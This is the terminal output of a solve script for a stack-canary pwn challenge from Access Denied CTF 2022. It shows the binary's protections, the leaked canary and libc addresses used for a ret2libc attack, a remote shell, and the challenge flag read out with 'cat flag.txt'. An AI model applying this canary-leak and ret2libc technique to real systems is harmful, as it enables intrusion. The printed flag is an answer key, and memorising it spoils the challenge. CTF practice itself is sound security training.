mito@ubuntu:~/CTF/Access_Denied_CTF_2022/Pwn_canary/canary$ python solve.py r
[*] '/home/mito/CTF/Access_Denied_CTF_2022/Pwn_canary/canary/canary'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
[+] Opening connection to 35.202.65.196 on port 1337: Done
[*] '/home/mito/CTF/Access_Denied_CTF_2022/Pwn_canary/canary/libc.so.6'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
canary      = 0x38669b868b8e3500
stack_leak  = 0x7ffda83a96f0
puts_addr   = 0x7fa13e33b970
libc_base   = 0x7fa13e2bb000
system_addr = 0x7fa13e30a420
binsh_addr  = 0x7fa13e46ed88
stack_leak  = 0x7ffda83a95c0
[*] Switching to interactive mode
Thank you
$ id
/bin/sh: 1: id: not found
$ ls -l
total 44
drwxr-x--- 1 0 1000  4096 Jun 11 07:12 bin
-rwxr-x--- 1 0 1000 17064 Jun 11 07:08 canary
drwxr-x--- 1 0 1000  4096 Jun 11 07:12 dev
-rwxr----- 1 0 1000    37 Jun 11 07:12 flag.txt
drwxr-x--- 1 0 1000  4096 Jun 11 07:12 lib
drwxr-x--- 1 0 1000  4096 Jun 11 07:12 lib32
drwxr-x--- 1 0 1000  4096 Jun 11 07:12 lib64
$ cat flag.txt
accessdenied{1_l0v3_c00k13s_89bde7a}